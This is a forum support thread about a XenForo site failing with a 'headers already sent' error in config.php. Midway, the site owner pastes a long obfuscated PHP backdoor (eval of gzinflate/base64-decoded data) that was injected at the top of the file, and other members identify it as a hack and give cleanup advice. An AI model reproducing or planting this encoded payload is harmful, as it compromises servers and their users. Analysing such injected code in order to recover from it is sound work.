XF 1.5 database error

[denisx04]

Just a white page that says

An unexpected error occurred. Please try again later.


Its been happening a lot now and I'm not sure what causes it or how to fix it my url is www.enixorigin.com any ideas or suggestions?

 

[Paul B]

If it's happening sporadically then it could point to server issues.

Enabling debug mode will show more details related to the error.

There should also be entries in the ACP error log.

 

[denisx04]

If it's happening sporadically then it could point to server issues.

Enabling debug mode will show more details related to the error.

There should also be entries in the ACP error log.

Brogan thank you for your reply, its been months since I've logged on the ACP since being overseas with my family and I completely forgot the admin link I thought it was link.com/admin but looks like I'm wrong

 

[Paul B]

It's url/admin.php

However, you may not be able to access that depending on the nature of the problem.

Enabling debug mode is likely the only option to get more details.

 

[denisx04]

It's url/admin.php

However, you may not be able to access that depending on the nature of the problem.

Enabling debug mode is likely the only option to get more details.

Thank you again, I enabled debug mode and my log has this error

Zend_Controller_Response_Exception: Cannot send headers; headers already sent in /home/enixor/public_html/forum/library/config.php, line 6 - library/Zend/Controller/Response/Abstract.php:321
Generated By: Unknown Account, A moment ago
Stack Trace
#0 /home/enixor/public_html/forum/library/Zend/Controller/Response/Abstract.php(115): Zend_Controller_Response_Abstract->canSendHeaders(true)
#1 /home/enixor/public_html/forum/library/XenForo/ViewRenderer/Abstract.php(63): Zend_Controller_Response_Abstract->setHeader('X-Frame-Options', 'SAMEORIGIN')
#2 /home/enixor/public_html/forum/library/XenForo/ViewRenderer/HtmlPublic.php(18): XenForo_ViewRenderer_Abstract->__construct(Object(XenForo_Dependencies_Public), Object(Zend_Controller_Response_Http), Object(Zend_Controller_Request_Http))
#3 /home/enixor/public_html/forum/library/XenForo/Dependencies/Public.php(207): XenForo_ViewRenderer_HtmlPublic->__construct(Object(XenForo_Dependencies_Public), Object(Zend_Controller_Response_Http), Object(Zend_Controller_Request_Http))
#4 /home/enixor/public_html/forum/library/XenForo/FrontController.php(547): XenForo_Dependencies_Public->getViewRenderer(Object(Zend_Controller_Response_Http), 'html', Object(Zend_Controller_Request_Http))
#5 /home/enixor/public_html/forum/library/XenForo/FrontController.php(141): XenForo_FrontController->_getViewRenderer('html')
#6 /home/enixor/public_html/forum/index.php(18): XenForo_FrontController->run()
#7 {main}
Request State
array(3) {
["url"] => string(73) "http://www.enixorigin.com/forum/threads/colorless-infinity-spectrum.2220/"
["_GET"] => array(0) {
}
["_POST"] => array(0) {
}
}

 

[Paul B]

That sounds like a corrupt config.php file.

Can you post the contents here, blanking out the database name, user, and password.

 

[denisx04]

$config['db']['host'] = 'localhost';
$config['db']['port'] = '3306';
$config['db']['username'] = 'enixor_den';
$config['db']['password'] = '';
$config['db']['dbname'] = '';

$config['cache']['enabled'] = true;
$config['cache']['frontend'] = 'Core';
$config['cache']['frontendOptions']['cache_id_prefix'] = 'enx_';

$config['debug'] = true;

$config['superAdmins'] = '1,8';

 

[TPerry]

Make sure that there is not a new line after your '1,8';
That needs to be the last line in the file. Also, what did you edit your config.php with? Load it up in mc (midnight commander) if you have it on your system and see if there are any unusual characters visible on any lines.

 

[denisx04]

Make sure that there is not a new line after your '1,8';
That needs to be the last line in the file. Also, what did you edit your config.php with? Load it up in mc (midnight commander) if you have it on your system and see if there are any unusual characters visible on any lines.

Hey Tracy, that's the first thing I checked and I can confirm there is no new line after the 1,8;. Not sure what midnight commander is but I will look into it. Many thanks for the suggestion.

 

[AndyB]

Zend_Controller_Response_Exception: Cannot send headers; headers already sent in /home/enixor/public_html/forum/library/config.php, line 6

Line 6 is your password.

$config['db']['password'] = '';

Double check you have the correct password for MySQL.

 

[denisx04]

Line 6 is your password.

$config['db']['password'] = '';

Double check you have the correct password for MySQL.

I verified that my password was correct, that was one of the first things I looked at as well.

 

[denisx04]

I forgot to mention, it does have some weird gibberish at the beginning of the file. Its really long just random words. I have no clue what it is. But its basically this...

<?php eval(gzinflate(base64_decode('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')));?><?php

 

[TPerry]

At the begininng of what file? The config.php? it's not normally a good thing to see a

gzinflate(base64_decode

in it. Frequently used in hacks. So where do you see that?

 

[denisx04]

I'll attach the file without my db name and password.

 

[TPerry]

I'll attach the file without my db name and password.

You've been hacked... are you using WordPress anywhere by chance?

 

[Paul B]

That does look like the file has been compromised.

There's no easy solution now.
You will need to sanitise the entire server files and database, as well as fixing the original hole which allowed the hacker to gain access.

 

[denisx04]

You've been hacked... are you using WordPress anywhere by chance?

Yes, I am, could that be why? Do I need to delete everything and start from scratch?

 

[TPerry]

Replace it with this one, but you still need to find the attack vector.

 

[Paul B]

And remove any backdoors which may have been installed.

 

[TPerry]

Yes, I am, could that be why? Do I need to delete everything and start from scratch?

You HAVE to keep up with WordPress versions and add-ons in use. There have been multiple attack vectors found in it over the last several months (I normally am having to do updates every couple of days on my sites).

Every PHP file is going to be in question. Best thing to do is wipe the VPS and start it over and make sure you have updated everything. You also will need to change any of your SSH passwords (yours and root) and any DB passwords for WP and XenForo.

You can probably keep the DB's, but I'd have questions on the WP one. You will need to replace all the files with new versions.